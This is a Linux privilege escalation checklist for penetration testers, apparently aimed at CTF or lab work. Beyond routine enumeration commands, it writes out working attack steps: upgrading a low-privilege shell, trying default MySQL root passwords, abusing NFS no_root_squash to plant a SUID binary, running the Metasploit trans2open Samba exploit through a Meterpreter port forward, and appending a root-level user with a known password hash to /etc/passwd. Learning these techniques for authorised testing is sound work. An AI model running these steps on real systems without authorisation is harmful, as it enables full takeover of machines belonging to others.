Linux Privilege escalation checklist
You have a low priv shell, now what?
python -c 'import pty; pty.spawn("/bin/bash")'OR
python3 -c 'import pty; pty.spawn("/bin/bash")'export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/tmp
export TERM=xterm-256color
alias ll='ls -lsaht --color=auto'
Ctrl + Z [Background Process]
stty raw -echo ; fg ; reset
stty columns 200 rows 200What can we do? who are we?
What binaries do we have on the machine?
which gcc
which cc
which python
which perl
which wget
which curl
which fetch
which nc
which ncat
which nc.traditional
which socatWhat Arch?
file /bin/bashKernel?
uname -aIssue/Release?
cat /etc/issue
cat /etc/*-releaseAre we a real user?
sudo -l
ls -lsaht /etc/sudoersAre any users a member of exotic groups?
groups <user>Check out your shell’s environment variables…
envLinux Privilege Escalation using PATH Variable
Users?
cd /home/
ls -lsahtWeb Configs containing credentials?
cd /var/www/html/
ls -lsahtSUID Binaries?
find / -perm -u=s -type f 2>/dev/nullGUID Binaries?
find / -perm -g=s -type f 2>/dev/nullSUID/GUID/SUDO Privilege Escalation: GTFOBins
Binary/Languages with “Effective Permitted” or “Empty Capability” (ep): GetCap and SetCap - File Capabilities
getcap -r / 2>/dev/nullIts good to monitor the system while performing our enumeration…
cd /var/tmp/
File Transfer --> pspy32
File Transfer --> pspy64
chmod 755 pspy32 pspy64
./pspy<32/64>What does the local network look like?
netstat -antup
netstat -tunlpIs anything vulnerable running as root?
ps aux |grep -i 'root' --color=autoMYSQL Credentials? Root Unauthorized Access?
mysql -uroot -p
Enter Password:
root : root
root : toor
root : Check to see if any user-level people did special things:
cd /etc/
ls -lsahtAnything other than root here?
-
Any config files left behind?
ls -lsaht |grep -i '.conf' --color=auto -
If we have root priv information disclosure - are there any
.secretin/etc/files?ls -lsaht |grep -i '.secret' --color=auto
any SSH Keys that can be used?
ls -lsaR /home/Quick look in:
ls -lsaht /var/lib/
ls -lsaht /var/db/Quick look in:
ls -lsaht /opt/
ls -lsaht /tmp/
ls -lsaht /var/tmp/
ls -lsaht /dev/shm/File Transfer Capability? What can I use to transfer files?
which wget
which curl
which nc
which fetch (BSD)
ls -lsaht /bin/ |grep -i 'ftp' --color=autoNFS? Can we exploit weak NFS Permissions?
cat /etc/exports
no_root_squash?[On Attacking Machine]
mkdir -p /mnt/nfs/
mount -t nfs -o vers=<version 1,2,3> $IP:<NFS Share> /mnt/nfs/ -nolock
gcc suid.c -o suid
cp suid /mnt/nfs/
chmod u+s /mnt/nfs/suid
su <user id matching target machine's user-level privilege.>[On Target Machine]
user@host$ ./suid
#Where can I live on this machine? Where can I read, write and execute files?
- /var/tmp/
- /tmp/
- /dev/shm/
Any exotic file system mounts/extended attributes?
cat /etc/fstabForwarding out a weak service for root priv (with meterpreter!): Do we need to get a meterpreter shell and forward out some ports that might be running off of the Loopback Adaptor (127.0.0.1) and forward them to any (0.0.0.0)? If we see something like Samba SMBD out of date on 127.0.0.1 - we should look to forward out the port and then run trans2open on our own machine at the forwarded port.
Port Forwarding with Meterpreter
Forwarding out netbios-ssn EXAMPLE:
meterpreter> portfwd add –l 139 –p 139 –r [target remote host]
meterpreter> background
use exploit/linux/samba/trans2open
set RHOSTS 0.0.0.0
set RPORT 139
runCan we write as a low-privileged user?
openssl passwd -1
i<3hacking
$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.
echo 'siren:$1$/UTMXpPC$Wrv6PM4eRHhB1/m1P.t9l.:0:0:siren:/home/siren:/bin/bash' >> /etc/passwd
su siren
idCron.
crontab –u root –lLook for unusual system-wide cron jobs:
cat /etc/crontab
ls /etc/cron.*Bob is a user on this machine. What is every single file he has ever created?
find / -user bob 2>/dev/nullAny mail? mbox in User $HOME directory?
cd /var/mail/
ls -lsahtLinpease:
LinPEAS on GitHub
Traitor:
Traitor on GitHub
GTFOBins: GTFOBins Website
PSpy32/Pspy64:
PSpy on GitHub
credits: s1ren s1ren